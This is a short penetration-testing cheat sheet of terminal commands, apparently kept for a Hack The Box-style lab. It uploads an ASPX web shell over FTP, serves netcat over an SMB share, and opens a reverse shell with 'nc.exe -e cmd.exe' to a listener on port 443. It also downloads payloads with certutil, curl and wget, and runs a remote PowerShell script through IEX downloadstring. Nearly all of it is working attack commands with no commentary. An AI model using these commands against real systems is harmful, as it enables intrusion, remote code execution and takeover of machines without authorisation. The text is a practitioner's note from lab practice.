oot@kali# locate cmd.aspx
/usr/share/davtest/backdoors/aspx_cmd.aspx
/usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx
root@kali# cp /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx .
ftp> put cmd.aspx
ftp> get file.txt
ftp> dir
ftp> binary
root@kali# mkdir smb
root@kali# locate nc.exe
/opt/SecLists/Web-Shells/FuzzDB/nc.exe
/opt/shells/netcat/nc.exe
/usr/lib/mono/4.5/cert-sync.exe
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/sqlninja/apps/nc.exe
/usr/share/windows-binaries/nc.exe
root@kali# cp /usr/share/windows-binaries/nc.exe smb/
root@kali# smbserver.py share smb
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
root@kali# nc -lnvp 443
\\10.10.14.14\share\nc.exe -e cmd.exe 10.10.14.14 443
This command should be ran in the uploaded file folder. Otherwise,the file will not be uploaded successfully.
python3 -m http.server 80 or python3 -m http.server 8000
python -m SimpleHTTPServer
certutil -urlcache -f http://10.10.14.5/putty.exe putty.exe
certutil -urlcache -split -f http://10.10.14.5/putty.exe putty.exe
dir
curl -O http://10.10.14.5/putty.exe
wget http://10.10.14.5/putty.exe
upload /home/kali/Desktop/htb/ttb/CVE-2021/CVE-2021.ps1
IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.5/CVE-2021.ps1')